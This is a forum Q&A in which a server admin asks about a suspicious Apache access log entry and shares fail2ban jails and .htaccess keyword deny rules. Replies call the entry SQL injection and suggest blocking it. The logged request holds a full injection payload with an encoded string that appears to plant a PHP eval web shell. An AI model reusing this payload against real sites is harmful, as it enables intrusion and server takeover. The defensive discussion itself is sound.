# I've been seeing a lot of this in my Apache access log

Tags: centos, apache-httpd, php5

```
14.210.192.182 - - [01/May/2019:04:43:14 -0500] "GET /user.php?act=login HTTP/1.1" 302 233 "554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:\"num\";s:288:\"*/ union select 1,0x272f2a,3,4,5,6,7,8,0x7b24617364275D3B617373657274286261736536345F6465636F646528275A6D6C735A56397764585266593239756447567564484D6F4A325A6B5A334575634768774A79776E50443977614841675A585A686243676B583142505531526262475678645630704F79412F506963702729293B2F2F7D787878,10-- -\";s:2:\"id\";s:3:\"'/*\";}" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)"
```

I'm not even sure how this type of exploit would work. It looks like it's trying to run sql from referer serialized data. Is this anything to worry about? All of the web apps on the server are using PDO with prepared statements.

```
Jail list:   apache-badbots, apache-noscript, apache-overflows, apache-sqlinject, sshd

RewriteCond %{QUERY_STRING} ^.*(localhost|loopback|127\.0\.0\.1).* [NC,OR]
RewriteCond %{QUERY_STRING} ^.*(union|schema|sql|jdatabasedriver|ini_set|user\.php).* [NC]
RewriteRule ^(.*)$ - [F,L]

RewriteCond %{HTTP_REFERER} ^.*(union|schema|sql|jdatabasedriver|ini_set|user\.php).* [NC]
RewriteRule ^(.*)$ - [F,L]
```

Comment: Yes, the Internet is the Wild West, but global. Even if you report that IP for hacking attempts, chances are it's in China, and there's nothing your ISP or police department can do. Best we can do is practice safe software, and study the attacks in order to know how to mitigate them.

Answer (score 1):

Somebody is trying SQL injection. If your code is safe, it should be okay. You can install apache modsecurity and create some rules to deny those kind of stuff or probably configure fail2ban to automatically add ip addresses doing things like that in blacklist. A few lines in your .htaccess can also cut the access to folks like that.

Comment: I'm using a mix of fail2ban and .htaccess as well, but something must be wrong with the HTTP_REFERER RewriteCond or my understanding of it, edited my question above to include the jails and relavent .htaccess